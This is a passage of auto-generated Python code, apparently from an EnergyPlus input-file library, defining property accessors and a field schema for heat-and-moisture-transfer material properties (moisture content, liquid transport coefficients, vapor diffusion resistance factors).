@liquid_transport_coefficient_8.setter
def liquid_transport_coefficient_8(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 8`"""
self["Liquid Transport Coefficient 8"] = value
@property
def moisture_content_9(self):
"""field `Moisture Content 9`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_9` or None if not set
"""
return self["Moisture Content 9"]
@moisture_content_9.setter
def moisture_content_9(self, value=None):
"""Corresponds to IDD field `Moisture Content 9`"""
self["Moisture Content 9"] = value
@property
def liquid_transport_coefficient_9(self):
"""field `Liquid Transport Coefficient 9`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_9` or None if not set
"""
return self["Liquid Transport Coefficient 9"]
@liquid_transport_coefficient_9.setter
def liquid_transport_coefficient_9(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 9`"""
self["Liquid Transport Coefficient 9"] = value
@property
def moisture_content_10(self):
"""field `Moisture Content 10`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_10` or None if not set
"""
return self["Moisture Content 10"]
@moisture_content_10.setter
def moisture_content_10(self, value=None):
"""Corresponds to IDD field `Moisture Content 10`"""
self["Moisture Content 10"] = value
@property
def liquid_transport_coefficient_10(self):
"""field `Liquid Transport Coefficient 10`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_10` or None if not set
"""
return self["Liquid Transport Coefficient 10"]
@liquid_transport_coefficient_10.setter
def liquid_transport_coefficient_10(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 10`"""
self["Liquid Transport Coefficient 10"] = value
@property
def moisture_content_11(self):
"""field `Moisture Content 11`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_11` or None if not set
"""
return self["Moisture Content 11"]
@moisture_content_11.setter
def moisture_content_11(self, value=None):
"""Corresponds to IDD field `Moisture Content 11`"""
self["Moisture Content 11"] = value
@property
def liquid_transport_coefficient_11(self):
"""field `Liquid Transport Coefficient 11`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_11` or None if not set
"""
return self["Liquid Transport Coefficient 11"]
@liquid_transport_coefficient_11.setter
def liquid_transport_coefficient_11(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 11`"""
self["Liquid Transport Coefficient 11"] = value
@property
def moisture_content_12(self):
"""field `Moisture Content 12`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_12` or None if not set
"""
return self["Moisture Content 12"]
@moisture_content_12.setter
def moisture_content_12(self, value=None):
"""Corresponds to IDD field `Moisture Content 12`"""
self["Moisture Content 12"] = value
@property
def liquid_transport_coefficient_12(self):
"""field `Liquid Transport Coefficient 12`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_12` or None if not set
"""
return self["Liquid Transport Coefficient 12"]
@liquid_transport_coefficient_12.setter
def liquid_transport_coefficient_12(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 12`"""
self["Liquid Transport Coefficient 12"] = value
@property
def moisture_content_13(self):
"""field `Moisture Content 13`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_13` or None if not set
"""
return self["Moisture Content 13"]
@moisture_content_13.setter
def moisture_content_13(self, value=None):
"""Corresponds to IDD field `Moisture Content 13`"""
self["Moisture Content 13"] = value
@property
def liquid_transport_coefficient_13(self):
"""field `Liquid Transport Coefficient 13`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_13` or None if not set
"""
return self["Liquid Transport Coefficient 13"]
@liquid_transport_coefficient_13.setter
def liquid_transport_coefficient_13(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 13`"""
self["Liquid Transport Coefficient 13"] = value
@property
def moisture_content_14(self):
"""field `Moisture Content 14`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_14` or None if not set
"""
return self["Moisture Content 14"]
@moisture_content_14.setter
def moisture_content_14(self, value=None):
"""Corresponds to IDD field `Moisture Content 14`"""
self["Moisture Content 14"] = value
@property
def liquid_transport_coefficient_14(self):
"""field `Liquid Transport Coefficient 14`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_14` or None if not set
"""
return self["Liquid Transport Coefficient 14"]
@liquid_transport_coefficient_14.setter
def liquid_transport_coefficient_14(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 14`"""
self["Liquid Transport Coefficient 14"] = value
@property
def moisture_content_15(self):
"""field `Moisture Content 15`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_15` or None if not set
"""
return self["Moisture Content 15"]
@moisture_content_15.setter
def moisture_content_15(self, value=None):
"""Corresponds to IDD field `Moisture Content 15`"""
self["Moisture Content 15"] = value
@property
def liquid_transport_coefficient_15(self):
"""field `Liquid Transport Coefficient 15`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_15` or None if not set
"""
return self["Liquid Transport Coefficient 15"]
@liquid_transport_coefficient_15.setter
def liquid_transport_coefficient_15(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 15`"""
self["Liquid Transport Coefficient 15"] = value
@property
def moisture_content_16(self):
"""field `Moisture Content 16`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_16` or None if not set
"""
return self["Moisture Content 16"]
@moisture_content_16.setter
def moisture_content_16(self, value=None):
"""Corresponds to IDD field `Moisture Content 16`"""
self["Moisture Content 16"] = value
@property
def liquid_transport_coefficient_16(self):
"""field `Liquid Transport Coefficient 16`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_16` or None if not set
"""
return self["Liquid Transport Coefficient 16"]
@liquid_transport_coefficient_16.setter
def liquid_transport_coefficient_16(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 16`"""
self["Liquid Transport Coefficient 16"] = value
@property
def moisture_content_17(self):
"""field `Moisture Content 17`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_17` or None if not set
"""
return self["Moisture Content 17"]
@moisture_content_17.setter
def moisture_content_17(self, value=None):
"""Corresponds to IDD field `Moisture Content 17`"""
self["Moisture Content 17"] = value
@property
def liquid_transport_coefficient_17(self):
"""field `Liquid Transport Coefficient 17`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_17` or None if not set
"""
return self["Liquid Transport Coefficient 17"]
@liquid_transport_coefficient_17.setter
def liquid_transport_coefficient_17(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 17`"""
self["Liquid Transport Coefficient 17"] = value
@property
def moisture_content_18(self):
"""field `Moisture Content 18`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_18` or None if not set
"""
return self["Moisture Content 18"]
@moisture_content_18.setter
def moisture_content_18(self, value=None):
"""Corresponds to IDD field `Moisture Content 18`"""
self["Moisture Content 18"] = value
@property
def liquid_transport_coefficient_18(self):
"""field `Liquid Transport Coefficient 18`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_18` or None if not set
"""
return self["Liquid Transport Coefficient 18"]
@liquid_transport_coefficient_18.setter
def liquid_transport_coefficient_18(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 18`"""
self["Liquid Transport Coefficient 18"] = value
@property
def moisture_content_19(self):
"""field `Moisture Content 19`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_19` or None if not set
"""
return self["Moisture Content 19"]
@moisture_content_19.setter
def moisture_content_19(self, value=None):
"""Corresponds to IDD field `Moisture Content 19`"""
self["Moisture Content 19"] = value
@property
def liquid_transport_coefficient_19(self):
"""field `Liquid Transport Coefficient 19`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_19` or None if not set
"""
return self["Liquid Transport Coefficient 19"]
@liquid_transport_coefficient_19.setter
def liquid_transport_coefficient_19(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 19`"""
self["Liquid Transport Coefficient 19"] = value
@property
def moisture_content_20(self):
"""field `Moisture Content 20`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_20` or None if not set
"""
return self["Moisture Content 20"]
@moisture_content_20.setter
def moisture_content_20(self, value=None):
"""Corresponds to IDD field `Moisture Content 20`"""
self["Moisture Content 20"] = value
@property
def liquid_transport_coefficient_20(self):
"""field `Liquid Transport Coefficient 20`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_20` or None if not set
"""
return self["Liquid Transport Coefficient 20"]
@liquid_transport_coefficient_20.setter
def liquid_transport_coefficient_20(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 20`"""
self["Liquid Transport Coefficient 20"] = value
@property
def moisture_content_21(self):
"""field `Moisture Content 21`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_21` or None if not set
"""
return self["Moisture Content 21"]
@moisture_content_21.setter
def moisture_content_21(self, value=None):
"""Corresponds to IDD field `Moisture Content 21`"""
self["Moisture Content 21"] = value
@property
def liquid_transport_coefficient_21(self):
"""field `Liquid Transport Coefficient 21`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_21` or None if not set
"""
return self["Liquid Transport Coefficient 21"]
@liquid_transport_coefficient_21.setter
def liquid_transport_coefficient_21(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 21`"""
self["Liquid Transport Coefficient 21"] = value
@property
def moisture_content_22(self):
"""field `Moisture Content 22`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_22` or None if not set
"""
return self["Moisture Content 22"]
@moisture_content_22.setter
def moisture_content_22(self, value=None):
"""Corresponds to IDD field `Moisture Content 22`"""
self["Moisture Content 22"] = value
@property
def liquid_transport_coefficient_22(self):
"""field `Liquid Transport Coefficient 22`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_22` or None if not set
"""
return self["Liquid Transport Coefficient 22"]
@liquid_transport_coefficient_22.setter
def liquid_transport_coefficient_22(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 22`"""
self["Liquid Transport Coefficient 22"] = value
@property
def moisture_content_23(self):
"""field `Moisture Content 23`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_23` or None if not set
"""
return self["Moisture Content 23"]
@moisture_content_23.setter
def moisture_content_23(self, value=None):
"""Corresponds to IDD field `Moisture Content 23`"""
self["Moisture Content 23"] = value
@property
def liquid_transport_coefficient_23(self):
"""field `Liquid Transport Coefficient 23`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 23`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_23` or None if not set
"""
return self["Liquid Transport Coefficient 23"]
@liquid_transport_coefficient_23.setter
def liquid_transport_coefficient_23(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 23`"""
self["Liquid Transport Coefficient 23"] = value
@property
def moisture_content_24(self):
"""field `Moisture Content 24`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_24` or None if not set
"""
return self["Moisture Content 24"]
@moisture_content_24.setter
def moisture_content_24(self, value=None):
"""Corresponds to IDD field `Moisture Content 24`"""
self["Moisture Content 24"] = value
@property
def liquid_transport_coefficient_24(self):
"""field `Liquid Transport Coefficient 24`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 24`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_24` or None if not set
"""
return self["Liquid Transport Coefficient 24"]
@liquid_transport_coefficient_24.setter
def liquid_transport_coefficient_24(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 24`"""
self["Liquid Transport Coefficient 24"] = value
@property
def moisture_content_25(self):
"""field `Moisture Content 25`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_25` or None if not set
"""
return self["Moisture Content 25"]
@moisture_content_25.setter
def moisture_content_25(self, value=None):
"""Corresponds to IDD field `Moisture Content 25`"""
self["Moisture Content 25"] = value
@property
def liquid_transport_coefficient_25(self):
"""field `Liquid Transport Coefficient 25`
| Units: m2/s
Args:
value (float): value for IDD Field `Liquid Transport Coefficient 25`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `liquid_transport_coefficient_25` or None if not set
"""
return self["Liquid Transport Coefficient 25"]
@liquid_transport_coefficient_25.setter
def liquid_transport_coefficient_25(self, value=None):
"""Corresponds to IDD field `Liquid Transport Coefficient 25`"""
self["Liquid Transport Coefficient 25"] = value
class MaterialPropertyHeatAndMoistureTransferDiffusion(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Diffusion`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between water vapor diffusion and relative humidity fraction
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of data pairs',
{'name': u'Number of Data Pairs',
'pyname': u'number_of_data_pairs',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'relative humidity fraction 1',
{'name': u'Relative Humidity Fraction 1',
'pyname': u'relative_humidity_fraction_1',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 1',
{'name': u'Water Vapor Diffusion Resistance Factor 1',
'pyname': u'water_vapor_diffusion_resistance_factor_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 2',
{'name': u'Relative Humidity Fraction 2',
'pyname': u'relative_humidity_fraction_2',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 2',
{'name': u'Water Vapor Diffusion Resistance Factor 2',
'pyname': u'water_vapor_diffusion_resistance_factor_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 3',
{'name': u'Relative Humidity Fraction 3',
'pyname': u'relative_humidity_fraction_3',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 3',
{'name': u'Water Vapor Diffusion Resistance Factor 3',
'pyname': u'water_vapor_diffusion_resistance_factor_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 4',
{'name': u'Relative Humidity Fraction 4',
'pyname': u'relative_humidity_fraction_4',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 4',
{'name': u'Water Vapor Diffusion Resistance Factor 4',
'pyname': u'water_vapor_diffusion_resistance_factor_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 5',
{'name': u'Relative Humidity Fraction 5',
'pyname': u'relative_humidity_fraction_5',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 5',
{'name': u'Water Vapor Diffusion Resistance Factor 5',
'pyname': u'water_vapor_diffusion_resistance_factor_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 6',
{'name': u'Relative Humidity Fraction 6',
'pyname': u'relative_humidity_fraction_6',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 6',
{'name': u'Water Vapor Diffusion Resistance Factor 6',
'pyname': u'water_vapor_diffusion_resistance_factor_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 7',
{'name': u'Relative Humidity Fraction 7',
'pyname': u'relative_humidity_fraction_7',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 7',
{'name': u'Water Vapor Diffusion Resistance Factor 7',
'pyname': u'water_vapor_diffusion_resistance_factor_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 8',
{'name': u'Relative Humidity Fraction 8',
'pyname': u'relative_humidity_fraction_8',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 8',
{'name': u'Water Vapor Diffusion Resistance Factor 8',
'pyname': u'water_vapor_diffusion_resistance_factor_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 9',
{'name': u'Relative Humidity Fraction 9',
'pyname': u'relative_humidity_fraction_9',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 9',
{'name': u'Water Vapor Diffusion Resistance Factor 9',
'pyname': u'water_vapor_diffusion_resistance_factor_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 10',
{'name': u'Relative Humidity Fraction 10',
'pyname': u'relative_humidity_fraction_10',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 10',
{'name': u'Water Vapor Diffusion Resistance Factor 10',
'pyname': u'water_vapor_diffusion_resistance_factor_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 11',
{'name': u'Relative Humidity Fraction 11',
'pyname': u'relative_humidity_fraction_11',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 11',
{'name': u'Water Vapor Diffusion Resistance Factor 11',
'pyname': u'water_vapor_diffusion_resistance_factor_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 12',
{'name': u'Relative Humidity Fraction 12',
'pyname': u'relative_humidity_fraction_12',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 12',
{'name': u'Water Vapor Diffusion Resistance Factor 12',
'pyname': u'water_vapor_diffusion_resistance_factor_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 13',
{'name': u'Relative Humidity Fraction 13',
'pyname': u'relative_humidity_fraction_13',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 13',
{'name': u'Water Vapor Diffusion Resistance Factor 13',
'pyname': u'water_vapor_diffusion_resistance_factor_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 14',
{'name': u'Relative Humidity Fraction 14',
'pyname': u'relative_humidity_fraction_14',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 14',
{'name': u'Water Vapor Diffusion Resistance Factor 14',
'pyname': u'water_vapor_diffusion_resistance_factor_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 15',
{'name': u'Relative Humidity Fraction 15',
'pyname': u'relative_humidity_fraction_15',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 15',
{'name': u'Water Vapor Diffusion Resistance Factor 15',
'pyname': u'water_vapor_diffusion_resistance_factor_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 16',
{'name': u'Relative Humidity Fraction 16',
'pyname': u'relative_humidity_fraction_16',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 16',
{'name': u'Water Vapor Diffusion Resistance Factor 16',
'pyname': u'water_vapor_diffusion_resistance_factor_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 17',
{'name': u'Relative Humidity Fraction 17',
'pyname': u'relative_humidity_fraction_17',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 17',
{'name': u'Water Vapor Diffusion Resistance Factor 17',
'pyname': u'water_vapor_diffusion_resistance_factor_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 18',
{'name': u'Relative Humidity Fraction 18',
'pyname': u'relative_humidity_fraction_18',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 18',
{'name': u'Water Vapor Diffusion Resistance Factor 18',
'pyname': u'water_vapor_diffusion_resistance_factor_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 19',
{'name': u'Relative Humidity Fraction 19',
'pyname': u'relative_humidity_fraction_19',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 19',
{'name': u'Water Vapor Diffusion Resistance Factor 19',
'pyname': u'water_vapor_diffusion_resistance_factor_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 20',
{'name': u'Relative Humidity Fraction 20',
'pyname': u'relative_humidity_fraction_20',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 20',
{'name': u'Water Vapor Diffusion Resistance Factor 20',
'pyname': u'water_vapor_diffusion_resistance_factor_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 21',
{'name': u'Relative Humidity Fraction 21',
'pyname': u'relative_humidity_fraction_21',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 21',
{'name': u'Water Vapor Diffusion Resistance Factor 21',
'pyname': u'water_vapor_diffusion_resistance_factor_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 22',
{'name': u'Relative Humidity Fraction 22',
'pyname': u'relative_humidity_fraction_22',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 22',
{'name': u'Water Vapor Diffusion Resistance Factor 22',
'pyname': u'water_vapor_diffusion_resistance_factor_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 23',
{'name': u'Relative Humidity Fraction 23',
'pyname': u'relative_humidity_fraction_23',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 23',
{'name': u'Water Vapor Diffusion Resistance Factor 23',
'pyname': u'water_vapor_diffusion_resistance_factor_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 24',
{'name': u'Relative Humidity Fraction 24',
'pyname': u'relative_humidity_fraction_24',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 24',
{'name': u'Water Vapor Diffusion Resistance Factor 24',
'pyname': u'water_vapor_diffusion_resistance_factor_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 25',
{'name': u'Relative Humidity Fraction 25',
'pyname': u'relative_humidity_fraction_25',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 25',
{'name': u'Water Vapor Diffusion Resistance Factor 25',
'pyname': u'water_vapor_diffusion_resistance_factor_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Diffusion',
'pyname': u'MaterialPropertyHeatAndMoistureTransferDiffusion',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Moisture Material Name that the moisture properties will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
